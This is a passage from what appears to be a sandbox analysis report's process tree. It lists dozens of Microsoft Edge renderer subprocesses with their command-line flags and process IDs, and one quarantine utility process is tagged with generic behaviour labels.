  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2376 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
  2⤵
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
  2⤵
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
  2⤵
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7292 /prefetch:1
  2⤵
  PID:5724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
  2⤵
  PID:848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8100 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:5380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7412 /prefetch:1
  2⤵
  PID:5140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
  2⤵
  PID:560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7636 /prefetch:1
  2⤵
  PID:888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1
  2⤵
  PID:2004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8324 /prefetch:1
  2⤵
  PID:6064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8552 /prefetch:1
  2⤵
  PID:6016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8560 /prefetch:1
  2⤵
  PID:2752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8680 /prefetch:1
  2⤵
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8784 /prefetch:1
  2⤵
  PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9052 /prefetch:1
  2⤵
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9236 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8960 /prefetch:1
  2⤵
  PID:4412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8520 /prefetch:1
  2⤵
  PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9932 /prefetch:1
  2⤵
  PID:2120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10076 /prefetch:1
  2⤵
  PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9588 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8992 /prefetch:1
  2⤵
  PID:1532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9672 /prefetch:1
  2⤵
  PID:5960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10072 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9008 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:1
  2⤵
  PID:1972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9412 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10172 /prefetch:1
  2⤵
  PID:3956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
  2⤵
  PID:5852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9512 /prefetch:1
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9720 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9844 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10208 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8972 /prefetch:1
  2⤵
  PID:5932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:1
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9960 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
  2⤵
  PID:5624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
  2⤵
  PID:884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9392 /prefetch:1
  2⤵
  PID:476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10008 /prefetch:1
  2⤵
  PID:2484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
  2⤵
  PID:1464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8936 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10100 /prefetch:1
  2⤵
  PID:2392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
  2⤵
  PID:5888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10136 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10624 /prefetch:1
  2⤵
  PID:5580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9040 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11000 /prefetch:1
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:1
  2⤵
  PID:5384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
  2⤵
  PID:5528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
